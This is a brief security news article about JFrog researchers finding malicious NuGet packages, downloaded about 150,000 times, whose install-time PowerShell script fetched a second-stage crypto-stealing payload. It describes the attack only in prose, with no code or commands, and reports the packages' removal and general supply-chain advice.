Attackers have been observed using the open source package manager NuGet to create malicious packages that target .NET developers.
According to JFrog, a software package management company, this discovery represents the first instance of a package containing malicious code found on NuGet.
As Shachar Menashe, senior director at JFrog Security Research, explains: “This proves that no open source repository is safe from malicious actors.”
Read more about malware targeting open source repositories here: Researchers Uncover 700+ Malicious Open Source Packages
According to an advisory created by JFrog security researchers Natan Nehorai and Brian Moussalli, the package was downloaded 150,000 times in the past month.
“[They] Contained a “Download & Execute” type payload […]A PowerShell script that runs during installation that triggers the download of a remotely executable “second stage” payload. The second-stage payload is a custom, more sophisticated executable,” Nehorai and Moussalli wrote.
The second stage payload offers several features including a crypto stealer, an Electron archive extractor (which also supports code execution), and an automatic updater.
In the advisory, JFrog security experts said they contacted NuGet admins and were told the team was aware of the malicious packages and removed them.
Still, Menashe said .NET developers are still at risk of malicious code, given that the observed NuGet packages still contain the ability to execute code when the package is installed. says there is.
“Even if a guilty malicious package […] Even with its removal, .NET developers using NuGet are still at high risk of malicious code infecting their environment,” the executive added. “[They] Care must be taken when curating open source components for use in builds and at all stages of the software development lifecycle to ensure a secure software supply chain. ”
For additional information on securing open source software, see this analysis by Amanda Brock, CEO of OpenUK.
